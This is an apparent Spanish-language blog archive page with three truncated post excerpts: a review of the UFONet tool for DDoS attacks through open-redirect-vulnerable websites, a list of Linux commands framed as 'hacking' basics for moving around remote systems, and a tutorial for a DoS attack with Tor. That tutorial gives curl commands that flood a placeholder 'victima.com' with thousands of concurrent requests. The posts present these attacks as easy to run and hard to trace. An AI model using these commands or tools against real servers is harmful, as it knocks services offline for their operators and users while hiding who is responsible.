Ir al contenido principal

Entradas

Mostrando entradas de febrero, 2018

Ataque DDOS sin botnet ni zombies con UFONET

Este es un pequeño y breve review sobre Ufonet . Una interesante herramienta que permite realizar ataques distribuídos de denegación de servicios (DDOS) sin valerse de máquinas zombies ni botnets .  En su lugar, utiliza múltiples webs vulnerables a Open Redirect para simular una botnet y lograr un ataque distribuído. Como funciona Ufonet? La función de Ufonet es realizar ataques distribuídos desde webs vulnerables. Como primer paso, utiliza dorks de google / bing para encontrar webs vulnerables, luego nos permite lanzar el ataque valiéndonos del listado de webs encontradas y realizar el ataque, aunque también incluye la opción de descargar el listado de webs vulnerables provisto por otros usuarios. Permite además utilizar TOR (opcionalmente) para conectarnos a las webs vulnerables. Pro y Contras Como pros, se puede mencionar que se trata de una forma rápida y fácil para realizar un ataque distribuído sin costo de tiempo y principalmente sin necesidad de tener un ejército de

Comandos básicos imprescindibles para hacking en Linux

A continuación, un pequeño resumen de comandos básicos de Linux y herramientas para los que recién empiezan. Son imprescindibles para moverse fluídamente en sistemas remotos, buscar, copiar, transferir, anonimato, etc  útiles al momento de ingresar a un sistema. Copiar archivos por SSH/SCP de local a remoto scp /ruta-archivo-origen usuario@servidor.com:/ruta-al-destino de remoto a local scp usuario@servidor.com:/ruta-archivo-origen /ruta-al-destino Descargar archivo remoto por http / https / ftp wget url.com/archivo Buscar una palabra dentro de todos los archivos de un directorio grep -r "texto a buscar" /directorio/ Buscar archivos find /directorio -name "nombre archivo" Buscar archivos con algun permiso en particular en todo el sistema find . -type f -perm 0775 Buscar archivos creados por un usuario en particular en todo el sistema find /directorio -user nombre-usuario Buscar por tamaño (ej: archivos hasta de 50MB) find / -size 50M Bus

Ejemplos de ataque DOS con Curl y Tor

Es posible realizar un ataque DOS (sin necesidad de que sea distribuído, sin herramientas especiales y con una conexión común), valiéndonos solamente de CURL para realizar miles de peticiones simultáneas  y TOR para ocultar nuestro rastro. Basicamente un ataque a la capa de aplicación . ¿Cómo? con curl, realizando múltiples peticiones por segundo y concurrentes, atacando al servidor web, aunque por lo general lo que termina consumiendo toda la memoria de la víctima es la base de datos que la web utiliza. Un ejemplo simple sería el siguiente: Enviamos 1000 peticiones con Curl: curl -s "http://victima.com/algo.php?[1-1000]" Si queremos que éstas peticiones sean a su vez concurrentes, entonces deberíamos poner en segundo plano cada llamada a curl tantas veces como concurrencias se necesiten.  Ejemplo:  curl -s "http://victima.com/algo.php?[1-1000]" & pidlist="$pidlist $!" curl -s "http://victima.com/algo.php?[1-1000]" & pidli